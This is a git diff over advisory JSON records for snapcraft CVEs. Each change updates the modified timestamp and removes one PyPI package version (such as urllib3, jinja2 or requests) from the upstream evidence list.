b/advisories/BREW-snapcraft-CVE-2021-28957.json index 3d29940d6fd..c6740431f99 100644 --- a/advisories/BREW-snapcraft-CVE-2021-28957.json +++ b/advisories/BREW-snapcraft-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-28957", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-33503.json b/advisories/BREW-snapcraft-CVE-2021-33503.json index 85c1262a31c..d988f3aa674 100644 --- a/advisories/BREW-snapcraft-CVE-2021-33503.json +++ b/advisories/BREW-snapcraft-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-33503", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-41945.json b/advisories/BREW-snapcraft-CVE-2021-41945.json index 7734119be82..f3e90cccfe2 100644 --- a/advisories/BREW-snapcraft-CVE-2021-41945.json +++ b/advisories/BREW-snapcraft-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-41945", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2021-43818.json b/advisories/BREW-snapcraft-CVE-2021-43818.json index efc6ad28926..c104bcb3a6f 100644 --- a/advisories/BREW-snapcraft-CVE-2021-43818.json +++ b/advisories/BREW-snapcraft-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2021-43818", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2022-1941.json b/advisories/BREW-snapcraft-CVE-2022-1941.json index 21c6c53d429..2ba8c497285 100644 --- a/advisories/BREW-snapcraft-CVE-2022-1941.json +++ b/advisories/BREW-snapcraft-CVE-2022-1941.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2022-1941", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8gq9-2x98-w8hf", "CVE-2022-1941", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.35.1", - "key": "pkg:pypi/protobuf@7.35.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2022-2309.json b/advisories/BREW-snapcraft-CVE-2022-2309.json index 7ccb5405221..0fa034cf7c4 100644 --- a/advisories/BREW-snapcraft-CVE-2022-2309.json +++ b/advisories/BREW-snapcraft-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2022-2309", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2022-36087.json b/advisories/BREW-snapcraft-CVE-2022-36087.json index 18776e4fbc1..15c7c4de4a4 100644 --- a/advisories/BREW-snapcraft-CVE-2022-36087.json +++ b/advisories/BREW-snapcraft-CVE-2022-36087.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2022-36087", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-3pgj-pg6c-r5p7", "CVE-2022-36087", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "oauthlib", - "subject_version": "3.3.1", - "key": "pkg:pypi/oauthlib@3.3.1", - "resource": "oauthlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2022-40897.json b/advisories/BREW-snapcraft-CVE-2022-40897.json index dd69958034f..0ac9b32eb3a 100644 --- a/advisories/BREW-snapcraft-CVE-2022-40897.json +++ b/advisories/BREW-snapcraft-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2022-40897", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2023-32681.json b/advisories/BREW-snapcraft-CVE-2023-32681.json index 27900301aa1..97cfbf8a4d5 100644 --- a/advisories/BREW-snapcraft-CVE-2023-32681.json +++ b/advisories/BREW-snapcraft-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2023-32681", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2023-43804.json b/advisories/BREW-snapcraft-CVE-2023-43804.json index 72d5a35481d..c098da8e380 100644 --- a/advisories/BREW-snapcraft-CVE-2023-43804.json +++ b/advisories/BREW-snapcraft-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2023-43804", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2023-45803.json b/advisories/BREW-snapcraft-CVE-2023-45803.json index 3f4e3f93b70..880e71c3f51 100644 --- a/advisories/BREW-snapcraft-CVE-2023-45803.json +++ b/advisories/BREW-snapcraft-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2023-45803", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-22195.json b/advisories/BREW-snapcraft-CVE-2024-22195.json index ea269612abc..3a7efbacb41 100644 --- a/advisories/BREW-snapcraft-CVE-2024-22195.json +++ b/advisories/BREW-snapcraft-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-22195", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-34064.json b/advisories/BREW-snapcraft-CVE-2024-34064.json index fa0d39c1107..9727d4e02da 100644 --- a/advisories/BREW-snapcraft-CVE-2024-34064.json +++ b/advisories/BREW-snapcraft-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-34064", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-35195.json b/advisories/BREW-snapcraft-CVE-2024-35195.json index 78f60b2bf27..959acdb6903 100644 --- a/advisories/BREW-snapcraft-CVE-2024-35195.json +++ b/advisories/BREW-snapcraft-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-35195", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-3651.json b/advisories/BREW-snapcraft-CVE-2024-3651.json index 1e22dab8510..29895fa05ba 100644 --- a/advisories/BREW-snapcraft-CVE-2024-3651.json +++ b/advisories/BREW-snapcraft-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-3651", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-37891.json b/advisories/BREW-snapcraft-CVE-2024-37891.json index 7844a93d95d..62b4f833270 100644 --- a/advisories/BREW-snapcraft-CVE-2024-37891.json +++ b/advisories/BREW-snapcraft-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-37891", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-47081.json b/advisories/BREW-snapcraft-CVE-2024-47081.json index 8db1044b6fc..10991c93a70 100644 --- a/advisories/BREW-snapcraft-CVE-2024-47081.json +++ b/advisories/BREW-snapcraft-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-47081", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-56201.json b/advisories/BREW-snapcraft-CVE-2024-56201.json index 4cdded6e0a4..fb73b31072f 100644 --- a/advisories/BREW-snapcraft-CVE-2024-56201.json +++ b/advisories/BREW-snapcraft-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-56201", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-56326.json b/advisories/BREW-snapcraft-CVE-2024-56326.json index 58c9a189172..a5dfe9b4ca7 100644 --- a/advisories/BREW-snapcraft-CVE-2024-56326.json +++ b/advisories/BREW-snapcraft-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-56326", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2024-6345.json b/advisories/BREW-snapcraft-CVE-2024-6345.json index 5db5ba28d21..a554babff44 100644 --- a/advisories/BREW-snapcraft-CVE-2024-6345.json +++ b/advisories/BREW-snapcraft-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2024-6345", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-27516.json b/advisories/BREW-snapcraft-CVE-2025-27516.json index acb49a571ce..da201040b1a 100644 --- a/advisories/BREW-snapcraft-CVE-2025-27516.json +++ b/advisories/BREW-snapcraft-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-27516", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-43859.json b/advisories/BREW-snapcraft-CVE-2025-43859.json index 5b6ac47d6de..0ab6b36d879 100644 --- a/advisories/BREW-snapcraft-CVE-2025-43859.json +++ b/advisories/BREW-snapcraft-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-43859", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-4565.json b/advisories/BREW-snapcraft-CVE-2025-4565.json index 27471108e2a..4d027e2861a 100644 --- a/advisories/BREW-snapcraft-CVE-2025-4565.json +++ b/advisories/BREW-snapcraft-CVE-2025-4565.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-4565", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8qvm-5x2c-j2w7", "CVE-2025-4565", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.35.1", - "key": "pkg:pypi/protobuf@7.35.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-47273.json b/advisories/BREW-snapcraft-CVE-2025-47273.json index 75b10adaff6..a0dcda14f14 100644 --- a/advisories/BREW-snapcraft-CVE-2025-47273.json +++ b/advisories/BREW-snapcraft-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-47273", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-50181.json b/advisories/BREW-snapcraft-CVE-2025-50181.json index a64f1be749e..3a0beb27edf 100644 --- a/advisories/BREW-snapcraft-CVE-2025-50181.json +++ b/advisories/BREW-snapcraft-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-50181", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-50182.json b/advisories/BREW-snapcraft-CVE-2025-50182.json index 9a6e2d64338..ebac291cd46 100644 --- a/advisories/BREW-snapcraft-CVE-2025-50182.json +++ b/advisories/BREW-snapcraft-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-50182", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-66418.json b/advisories/BREW-snapcraft-CVE-2025-66418.json index 58fa04ff85b..49dfe45d75f 100644 --- a/advisories/BREW-snapcraft-CVE-2025-66418.json +++ b/advisories/BREW-snapcraft-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-66418", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-66471.json b/advisories/BREW-snapcraft-CVE-2025-66471.json index 4f473acfd88..129930e8da6 100644 --- a/advisories/BREW-snapcraft-CVE-2025-66471.json +++ b/advisories/BREW-snapcraft-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-66471", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2025-69277.json b/advisories/BREW-snapcraft-CVE-2025-69277.json index d03fe44435b..0ab72419216 100644 --- a/advisories/BREW-snapcraft-CVE-2025-69277.json +++ b/advisories/BREW-snapcraft-CVE-2025-69277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2025-69277", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-mrfv-m5wm-5w6w", "CVE-2025-69277", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pynacl", - "subject_version": "1.6.2", - "key": "pkg:pypi/pynacl@1.6.2", - "resource": "pynacl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-0994.json b/advisories/BREW-snapcraft-CVE-2026-0994.json index 5770e2231e3..1f97d95bc11 100644 --- a/advisories/BREW-snapcraft-CVE-2026-0994.json +++ b/advisories/BREW-snapcraft-CVE-2026-0994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-0994", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-7gcm-g887-7qv7", "CVE-2026-0994", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.35.1", - "key": "pkg:pypi/protobuf@7.35.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-21441.json b/advisories/BREW-snapcraft-CVE-2026-21441.json index 650a5ddd3ce..35dd707ae30 100644 --- a/advisories/BREW-snapcraft-CVE-2026-21441.json +++ b/advisories/BREW-snapcraft-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-21441", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-23949.json b/advisories/BREW-snapcraft-CVE-2026-23949.json index fbaa1655bb6..c9559fe5b53 100644 --- a/advisories/BREW-snapcraft-CVE-2026-23949.json +++ b/advisories/BREW-snapcraft-CVE-2026-23949.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-23949", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-58pv-8j8x-9vj2", "CVE-2026-23949", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jaraco-context", - "subject_version": "6.1.2", - "key": "pkg:pypi/jaraco-context@6.1.2", - "resource": "jaraco-context" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-25645.json b/advisories/BREW-snapcraft-CVE-2026-25645.json index 273da5a79a2..8be21f2a6db 100644 --- a/advisories/BREW-snapcraft-CVE-2026-25645.json +++ b/advisories/BREW-snapcraft-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-25645", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-41066.json b/advisories/BREW-snapcraft-CVE-2026-41066.json index 9d4fb4455cc..6b7518d55a6 100644 --- a/advisories/BREW-snapcraft-CVE-2026-41066.json +++ b/advisories/BREW-snapcraft-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-41066", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - 